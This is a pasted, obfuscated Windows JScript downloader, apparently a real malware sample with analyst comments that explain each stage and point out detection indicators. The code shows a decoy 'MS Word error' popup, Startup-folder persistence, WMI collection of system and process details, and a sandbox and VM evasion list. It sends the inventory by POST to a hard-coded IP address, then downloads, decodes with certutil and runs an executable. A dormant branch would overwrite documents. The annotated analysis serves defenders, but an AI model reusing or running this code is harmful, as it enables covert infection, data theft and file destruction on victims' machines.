
Untitled

a guest Jul 3rd, 2019 395 Never
  // Analyst annotation: state and configuration for an obfuscated Windows Script Host (JScript)
  // downloader. Identifier names are junk; each note below gives the role the variable plays
  // later in this listing.
  // mdEAithey85: gates the decoy Popup shown on first run.
  1. var mdEAithey85 = true;
  // mdEAibusy41: one of the conditions for writing the copy into the Startup folder.
  2. var mdEAibusy41 = true;
  // mdEAitime62: gates the drive-walk / file-replacement branch; false here, so that branch never runs.
  3. var mdEAitime62 = false;
  // mdEAiopinions92: accumulator for the 32-bit host hash that is sent as the "p" parameter.
  4. var mdEAiopinions92 = 0;
  // mdEAiachieve86: loop index for the hash, then reused as the "k" parameter (10 or 20).
  5. var mdEAiachieve86 = 0;
  // mdEAiwithout49: set to true once the script has read its own first line.
  6. var mdEAiwithout49 = false;
  // mdEAiitself10: option id passed to ServerXMLHTTP.setOption.
  7. var mdEAiitself10 = 3;
  // Handles and buffers assigned later: file streams, the HTTP response text, and the
  // script's own first line (mdEAiinto43).
  8. var mdEAiresolvedto17 = null;
  9. var mdEAithrough13 = null;
  10. var mdEAivisit40 = null;
  11. var mdEAiwith35 = null;
  12. var mdEAiconsidered87 = null;
  13. var mdEAiinto43 = null;
  // mdEAidisproportionate79: row counter that caps the two WMI enumeration loops.
  14. var mdEAidisproportionate79 = 0;
  // mdEAiespecially5: set to true when the analysis-environment check matches.
  15. var mdEAiespecially5 = false;
  // mdEAiability89: doubles as the indexOf "not found" sentinel (-1) and as the mode value
  // read by the switch that launches the payload.
  16. var mdEAiability89 = -1;
  // mdEAidefences47: only used as the always-truthy condition of the request loop.
  17. var mdEAidefences47 = 7;
  // mdEAistudy74: Popup type argument, and the always-truthy condition of the delay loop.
  18. var mdEAistudy74 = 1;
  // Title and text of the decoy dialog: a fake "MS Word error" message.
  19. var mdEAiwere19 = "[!]";
  20. var mdEAithat49 = "MS Word error: 0x0030EF65";
  21.  
  // Host objects are fetched through string keys on `this` rather than by name, which hides
  // WScript and ActiveXObject from a plain identifier search; detection rules should match the
  // ProgID strings instead ("Scripting.FileSystemObject", "WScript.Shell").
  22. var mdEAiThis30 = this["WScript"];
  23. var mdEAilabour79 = this["ActiveXObject"];
  // Full path of the running script; used below to tell whether it runs from a Startup folder.
  24. var mdEAileaders26 = mdEAiThis30["ScriptFullName"];
  // File system access (read self, write files, enumerate drives).
  25. var mdEAicheap26 = new mdEAilabour79("Scripting.FileSystemObject");
  // Shell object used for Popup and for expanding environment variables.
  26. var mdEAimore40 = mdEAiThis30["CreateObject"]("WScript.Shell");
  27.  
  // First-run handling. When the script path does not contain "\Startup\", the script opens
  // itself, keeps its first line in mdEAiinto43 (written to the Startup folder later), and
  // shows the fake Word error as a decoy with a 30-second timeout.
  // NOTE(review): the literals printed as "\" look like "\\" that lost a backslash during
  // extraction; as shown these lines do not parse. Presumably the original file holds the whole
  // script on one line, since only ReadLine() is used to capture it; confirm against the raw sample.
  28. try {
  29.     if (mdEAileaders26["indexOf"]("\" + "Startup" + "\") == -1) {
  30.        mdEAiresolvedto17 = mdEAicheap26["OpenTextFile"](mdEAileaders26, 1, false, 0);
  31.        mdEAiinto43 = mdEAiresolvedto17["ReadLine"]();
  32.        mdEAiresolvedto17["Close"]();
  33.        mdEAiwithout49 = true;
  34.        if (mdEAithey85) {
  35.            mdEAimore40["Popup"](unescape(mdEAithat49), 30, unescape(mdEAiwere19), mdEAistudy74);
  36.        }
  37.    }
  38. } catch (Njmsqad) {
  // Any failure above still shows the decoy dialog, with a 6-second timeout.
  39.    mdEAimore40["Popup"](mdEAithat49, 6, mdEAiwere19, mdEAistudy74);
  40. }
  41.  
  // Main stage (analyst annotation). Behaviour visible in this block, useful as detection points:
  //   - a script host enumerating Win32_Process / Win32_OperatingSystem through WMI;
  //   - a file named shell.jse written to the folder returned by NameSpace(7);
  //   - synchronous HTTPS POSTs to https://185.159.82.20/t-34/x644.php from the script host;
  //   - a custom response header "RedSparrow";
  //   - numerically named .exe / .cro files in %TEMP% and "certutil -f -decode" run hidden.
  // The counter below spins to 2,090,000 before anything else happens, so the work starts only
  // after a long busy loop; the body then runs once and never leaves the inner request loop.
  42. var mdEAireason4 = 1;
  43. var mdEAithey86 = ("2090000") * 1;
  44. while (mdEAistudy74) {
  45.    mdEAithat49 = "ac";
  46.    mdEAireason4 = mdEAireason4 + 1;
  47.    if (mdEAireason4 == mdEAithey86) {
  // COM objects and constants for this stage: WMI access, Shell.Application (ShellExecute and
  // special folders), ADODB.Stream (binary file write), ServerXMLHTTP (network).
  48.        var mdEAiquiet2 = this["Enumerator"];
  49.        var mdEAiknew41 = this["GetObject"];
  50.        var mdEAiwere47 = new mdEAilabour79("Shell.Application");
  51.        var mdEAiyounger30 = new mdEAilabour79("ADODB.Stream");
  52.        var mdEAimotives13 = new mdEAilabour79("Msxml2.ServerXMLHTTP");
  53.        var mdEAisufficient11 = mdEAimore40["ExpandEnvironmentStrings"]("%USERPROFILE%");
  // Character 34 is the double quote, used to quote paths on command lines.
  54.        var mdEAiacted13 = String["fromCharCode"](34);
  55.        var mdEAiquestion47 = Math["floor"]((Math["random"]() * (900)) + 1);
  56.        var mdEAithose44 = mdEAimore40["ExpandEnvironmentStrings"]("%TEMP%");
  // Persistence target: <NameSpace(7) path>\shell.jse. NOTE(review): special-folder id 7 is,
  // as far as I know, the per-user Startup folder; the "\Startup\" test earlier is consistent
  // with that.
  57.        var mdEAiskilled63 = "\" + "shell.jse";
  58.        var mdEAirecall6 = mdEAiwere47["NameSpace"](7);
  59.        var mdEAicarefully66 = mdEAirecall6["Self"]["Path"] + mdEAiskilled63;
  // Seed string for the host hash: persistence path followed by the %TEMP% path.
  60.        var mdEAiobjectively96 = mdEAicarefully66 + mdEAithose44;
  // Request URL parts. The endpoint is a bare IP address over https (network indicator).
  61.        var mdEAimore39 = "&sin=tamud";
  62.        var mdEAipeople52 = "https://185.159.82.20/t-34/x644.php";
  63.         var mdEAiapostles32 = "?min=fr";
  64.         var mdEAicentre32 = mdEAipeople52 + mdEAiapostles32;
  65.         var mdEAithat11 = mdEAicheap26["Drives"];
  // Document patterns and list-file name used only by the drive-walk branch, which is gated
  // on mdEAitime62 (false in this listing).
  66.         var mdEAiimpressions49 = "*.doc *.xls *.pdf *.rtf *.txt *.pub *.odt *.ods *.odp *.odm *.odc *.odb";
  67.         var mdEAiwrong86 = '';
  68.         var mdEAitheir20 = "ascii.txt";
  69.         var mdEAiexcuse39 = null;
  70.         var mdEAiexistence6 = mdEAiopinions92;
  71.         var mdEAithing92 = null;
  72.         var mdEAithat60 = null;
  73.         var mdEAipaid22 = mdEAiopinions92;
  74.         var mdEAihonest33 = '';
  75.         var mdEAishall49 = '';
  76.         var mdEAiexistence62 = null;
  77.         var mdEAibeing97 = '';
  78.         var mdEAiSuch36 = '';
  79.         var mdEAitheoretical52 = '';
  80.         var mdEAirenunciation97 = null;
  81.         var mdEAithis15 = null;
  // 4294967295 is the 0xFFFFFFFF mask applied to the hash.
  82.         var mdEAionly63 = ("4294967295") * 1;
  // certutil arguments, the "MZ" prefix checked before launching a file, and the HTTP verb.
  83.         var mdEAiwere92 = "-f -decode ";
  84.         var mdEAiground81 = "MZ";
  85.         var mdEAiexpectation22 = "POST";
  86.         var mdEAimidst53 = '';
  // mdEAiproved2: status code echoed to the server as the "i" parameter.
  87.         var mdEAiproved2 = 0;
  // Host inventory through WMI (root\cimv2): OS caption and version (at most 5 rows), then up
  // to 200 processes as "Name*ExecutablePath" lines. Errors are swallowed, which leaves the
  // report short.
  88.         try {
  89.             mdEAithing92 = mdEAiknew41("winmgmts:{impersonationLevel=impersonate}!" + "\" + "\" + "." + "\" + "root" + "\" + "cimv2");
  90.            mdEAiexistence6 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_Process"));
  91.            mdEAiexistence62 = new mdEAiquiet2(mdEAithing92["ExecQuery"]("Select * from Win32_OperatingSystem"));
  92.            while (!mdEAiexistence62["atEnd"]()) {
  93.                if (mdEAidisproportionate79 == 5) break;
  94.                mdEAishall49 = mdEAishall49 + mdEAiexistence62["item"]()["Caption"] + mdEAiexistence62["item"]()["Version"];
  95.                mdEAidisproportionate79++;
  96.                mdEAiexistence62["moveNext"]();
  97.            }
  98.            mdEAishall49 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAicarefully66;
  99.            mdEAidisproportionate79 = 0;
  100.            while (!mdEAiexistence6["atEnd"]()) {
  101.                if (mdEAidisproportionate79 == 200) break;
  102.                mdEAithat60 = mdEAiexistence6["item"]();
  103.                mdEAihonest33 = mdEAihonest33 + mdEAithat60["Name"] + "*" + mdEAithat60["ExecutablePath"] + String["fromCharCode"](13) + String["fromCharCode"](10);
  104.                mdEAidisproportionate79++;
  105.                mdEAiexistence6["moveNext"]();
  106.            }
  107.        } catch (Njmsqad) {}
  // Host identifier: h = ((h << 5) - h) + charCode, i.e. h * 31 + c, masked with 0xFFFFFFFF,
  // computed over the persistence path, the %TEMP% path and the OS string. "k" becomes 10 when
  // the persistence path lacks "\AppData\", otherwise 20. On error the hash is set to 7777777.
  108.        try {
  109.            mdEAiobjectively96 = mdEAiobjectively96 + mdEAishall49;
  110.            for (mdEAiachieve86 = 0; mdEAiachieve86 < mdEAiobjectively96["length"]; mdEAiachieve86++) {
  111.                mdEAiopinions92 = (((mdEAiopinions92 << (5)) - mdEAiopinions92) + mdEAiobjectively96["charCodeAt"](mdEAiachieve86)) & mdEAionly63;
  112.            }
  113.            if (mdEAicarefully66["indexOf"]("\" + "AppData" + "\") == -1) {
  114.                mdEAiachieve86 = 5 + 5;
  115.            } else {
  116.                mdEAiachieve86 = 20;
  117.            }
  118.        } catch (Njmsqad) {
  119.            mdEAiopinions92 = 7777777;
  120.        }
  // The report is the OS string followed by the process list.
  121.        mdEAihonest33 = mdEAishall49 + String["fromCharCode"](13) + String["fromCharCode"](10) + mdEAihonest33;
  // Analysis-environment check: a report shorter than 1400 characters, or any of the listed
  // substrings (monitoring and debugging tools, VM guest services, and specific user, host and
  // path names), sets mdEAiespecially5. mdEAiability89 is still -1 here, so "!= mdEAiability89"
  // means "substring found".
  // NOTE(review): `view` is not defined anywhere in this listing, so the call below presumably
  // throws outside any try block and ends the script; confirm on the raw sample. Sandbox
  // reports in which the script exits right after WMI enumeration are consistent with this.
  122.        if (mdEAihonest33["length"] < 1400 || mdEAihonest33["indexOf"]("2B.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Procmon") != mdEAiability89 || mdEAihonest33["indexOf"]("Wireshark") != mdEAiability89 || mdEAihonest33["indexOf"]("Temp" + "\" + "iexplore.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ProcessHacker") != mdEAiability89 || mdEAihonest33["indexOf"]("vmtoolsd") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxService") != mdEAiability89 || mdEAihonest33["indexOf"]("python") != mdEAiability89 || mdEAihonest33["indexOf"]("Proxifier.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Johnson") != mdEAiability89 || mdEAihonest33["indexOf"]("ImmunityDebugger.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("lordPE.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("ctfmon.exe*JOHN-PC") != mdEAiability89 || mdEAihonest33["indexOf"]("BehaviorDumper") != mdEAiability89 || mdEAihonest33["indexOf"]("anti-virus.EXE") != mdEAiability89 || mdEAihonest33["indexOf"]("AgentSimulator.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VzService.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VBoxTray.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("VmRemoteGuest") != mdEAiability89 || mdEAihonest33["indexOf"]("SystemIT|admin") != mdEAiability89 || mdEAihonest33["indexOf"]("WIN7-TRAPS") != mdEAiability89 || mdEAihonest33["indexOf"]("Emily" + "\" + "AppData") != mdEAiability89 || mdEAihonest33["indexOf"]("PROCMON") != mdEAiability89 || mdEAihonest33["indexOf"]("procexp") != mdEAiability89 || mdEAihonest33["indexOf"]("tcpdump") != mdEAiability89 || mdEAihonest33["indexOf"]("FrzState2k") != mdEAiability89 || mdEAihonest33["indexOf"]("DFLocker64") != mdEAiability89 || mdEAihonest33["indexOf"]("vmware") != mdEAiability89 || mdEAihonest33["indexOf"]("LOGSystem.Agent.Service.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + "\" + "user" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("C:" + "\" + "Users" + 
"\" + "milozs" + "\") != mdEAiability89 || mdEAihonest33["indexOf"]("windanr.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("gemu-ga.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("HAPUBWS") != mdEAiability89 || mdEAihonest33["indexOf"]("BennyDB.exe") != mdEAiability89 || mdEAihonest33["indexOf"]("Peter Wilson") != mdEAiability89 || mdEAihonest33["indexOf"]("Hong Lee") != mdEAiability89) {
  123.            mdEAiespecially5 = true;
  124.            view["close"]("we_need_to_go_deeper");
  125.        }
  // Persistence: when the first line was captured on first run and the check above did not
  // match, that line is written to the shell.jse path (CreateTextFile with overwrite = true).
  // Errors are swallowed.
  126.        try {
  127.            if (mdEAiwithout49 && mdEAibusy41 && !mdEAiespecially5) {
  128.                mdEAithrough13 = mdEAicheap26["CreateTextFile"](mdEAicarefully66, true, false);
  129.                mdEAithrough13["WriteLine"](mdEAiinto43);
  130.                mdEAithrough13["Close"]();
  131.            }
  132.        } catch (Njmsqad) {}
  // Request loop; never exits (the condition is the constant 7). Each pass picks fresh random
  // names under %TEMP%: <n><n>.exe as the write target and <n><n>.cro as a text staging file.
  133.        while (mdEAidefences47) {
  134.            try {
  135.                mdEAimidst53 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".exe";
  136.                mdEAiwrong86 = mdEAithose44 + "\" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + ".cro";
  // NOTE(review): option 3 on ServerXMLHTTP is, to my knowledge, the client-SSL-certificate
  // selection option; confirm against the MSXML documentation.
  137.                mdEAimotives13["setOption"](mdEAiitself10, "MSXML");
  // Query string: p = abs(host hash), i = last status code, k = 10 or 20, r = random digits.
  138.                mdEAiexcuse39 = mdEAicentre32 + mdEAimore39 + "&p=" + Math["abs"](mdEAiopinions92) + "&i=" + mdEAiproved2 + "&k=" + mdEAiachieve86 + "&r=" + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1) + Math["floor"]((Math["random"]() * (999)) + 1);
  // Synchronous POST; the body is the OS and process inventory collected above.
  139.                mdEAimotives13["open"](mdEAiexpectation22, mdEAiexcuse39, false);
  140.                mdEAimotives13["send"](mdEAihonest33);
  141.                if (mdEAimotives13["status"] == 200) {
  142.                    if (mdEAiproved2 == 0) {
  143.                        mdEAivisit40 = mdEAimotives13["responseText"];
  // Response header "RedSparrow" equal to '0' redirects the write target to the shell.jse
  // path, so the response body replaces the persisted script, and sets mode 0.
  144.                        try {
  145.                            if (mdEAimotives13["getResponseHeader"]("RedSparrow") == '0') {
  146.                                mdEAimidst53 = mdEAicarefully66;
  147.                                mdEAiability89 = 0;
  148.                            }
  149.                        } catch (Njmsqad) {}
  // Two delivery paths. "Content-Transfer-Encoding: binary": the raw body is saved with
  // ADODB.Stream (SaveToFile option 2). Otherwise a text body longer than 10 characters is
  // written to the .cro file and, after 7 seconds, decoded to the target by
  // "certutil -f -decode" started with window style 0.
  150.                        try {
  151.                            if (mdEAimotives13["getResponseHeader"]("Content-Transfer-Encoding") == "binary") {
  152.                                mdEAiyounger30["Open"]();
  153.                                mdEAiyounger30["Type"] = 1;
  154.                                mdEAiyounger30["Write"](mdEAimotives13["responseBody"]);
  155.                                mdEAiyounger30["Position"] = 0;
  156.                                mdEAiyounger30["SaveToFile"](mdEAimidst53, 2);
  157.                                mdEAiyounger30["Close"]();
  158.                            } else {
  159.                                if (mdEAivisit40.length > 10) {
  160.                                    mdEAiresolvedto17 = mdEAicheap26["CreateTextFile"](mdEAiwrong86, true, false);
  161.                                    mdEAiresolvedto17["WriteLine"](mdEAivisit40);
  162.                                    mdEAiresolvedto17["Close"]();
  163.                                    mdEAiThis30["Sleep"](7000);
  164.                                    mdEAiwere47["ShellExecute"]("certutil", mdEAiwere92 + mdEAiwrong86 + " " + mdEAiacted13 + mdEAimidst53 + mdEAiacted13, '', "open", 0);
  165.                                }
  166.                            }
  167.                        } catch (Njmsqad) {}
  168.                    } else {
  // A non-zero "i" means this request only reported a status; reset it and start over.
  169.                        mdEAiproved2 = 0;
  170.                        continue;
  171.                    }
  // After a script replacement (mode 0): wait 50 s, restore mode -1, report status 9.
  172.                    if (mdEAiability89 == 0) {
  173.                        mdEAiThis30["Sleep"](50000);
  174.                        mdEAiability89 = -1;
  175.                        mdEAiproved2 = 9;
  176.                        continue;
  177.                    }
  178.                    mdEAiThis30["Sleep"](33000);
  // Drive-walk branch: requires the target file to be missing AND mdEAitime62, which is false
  // in this listing, so this code does not run here. As written it would list files matching
  // the document patterns on every ready drive of type 3 or 1 other than the profile drive
  // (NOTE(review): network and removable in the FileSystemObject enum, if I recall it
  // correctly; confirm), copy the persisted script next to each as <name>.jse and delete the
  // original. That is destructive for the listed files.
  179.                    if (!mdEAicheap26["FileExists"](mdEAimidst53) && mdEAitime62) {
  180.                        try {
  181.                            mdEAirenunciation97 = new mdEAiquiet2(mdEAithat11);
  182.                            for (; !mdEAirenunciation97["atEnd"](); mdEAirenunciation97["moveNext"]()) {
  183.                                mdEAithis15 = mdEAirenunciation97["item"]();
  184.                                if ((mdEAithis15["IsReady"] && (mdEAithis15["DriveType"] == 3 || mdEAithis15["DriveType"] == 1)) && mdEAisufficient11["substring"](0, 1) != mdEAithis15["DriveLetter"]) {
  185.                                    mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C cd /D " + mdEAithis15["DriveLetter"] + ": && dir /b/s/x " + mdEAiimpressions49 + ">>%TEMP%" + "\" + mdEAitheir20, '', "open", 0);
  186.                                    mdEAiThis30["Sleep"](60000);
  187.                                }
  188.                            }
  189.                            mdEAiThis30["Sleep"](50000);
  190.                            mdEAiconsidered87 = mdEAicheap26["GetFile"](mdEAithose44 + "\" + mdEAitheir20)["OpenAsTextStream"](1, -1);
  191.                            while (!mdEAiconsidered87["AtEndOfStream"]) {
  192.                                mdEAiSuch36 = mdEAiconsidered87["ReadLine"]();
  193.                                mdEAitheoretical52 = mdEAiSuch36["substring"](0, mdEAiSuch36["indexOf"]("."));
  194.                                mdEAiwere47["ShellExecute"]("cmd", "/U /Q /C copy /Y " + mdEAiacted13 + mdEAicarefully66 + mdEAiacted13 + " " + mdEAiacted13 + mdEAitheoretical52 + ".jse" + mdEAiacted13 + " && del /Q/F " + mdEAiacted13 + mdEAiSuch36 + mdEAiacted13, '', "open", 0);
  195.                            }
  196.                            mdEAiconsidered87["Close"]();
  197.                            mdEAicheap26["DeleteFile"](mdEAithose44 + "\" + mdEAitheir20);
  198.                        } catch (Njmsqad) {}
  199.                        mdEAiproved2 = 0;
  200.                        continue;
  201.                    }
  // Reads the first two characters of the written file; only an "MZ" prefix is launched.
  // If the file is missing, GetFile throws and the outer catch swallows it.
  202.                    mdEAiwith35 = mdEAicheap26["GetFile"](mdEAimidst53)["OpenAsTextStream"](1);
  203.                    mdEAibeing97 = mdEAiwith35["ReadLine"]()["substring"](0, 2);
  204.                    mdEAiwith35["Close"]();
  205.                    if (mdEAibeing97 == mdEAiground81 && mdEAiproved2 == 0) {
  // Mode -1 launches the downloaded file through Shell.Application.ShellExecute and reports
  // status 59; a failure reports 9888. Cases 0 to 2 only set a status code and appear
  // unreachable in this listing, because mode is only ever -1 or 0 and 0 is handled above.
  206.                        try {
  207.                            switch (mdEAiability89) {
  208.                                case -1:
  209.                                    mdEAiwere47["ShellExecute"](mdEAimidst53, null, '', "open", 1);
  210.                                    mdEAiproved2 = 59;
  211.                                    break;
  212.                                case 0:
  213.                                    mdEAiproved2 = 60;
  214.                                    break;
  215.                                case 1:
  216.                                    mdEAiproved2 = 61;
  217.                                    break;
  218.                                case 2:
  219.                                    mdEAiproved2 = 62;
  220.                                    break;
  221.                            }
  222.                        } catch (Njmsqad) {
  223.                            mdEAiproved2 = 9888;
  224.                        }
  225.                        mdEAiThis30["Sleep"](9000);
  226.                    }
  227.                }
  228.            } catch (Njmsqad) {}
  // 50-second pause between iterations; with the 33-second wait above, successful rounds
  // repeat on a coarse, regular interval.
  229.            mdEAiThis30["Sleep"](50000);
  230.        };
  231.    };
  232. };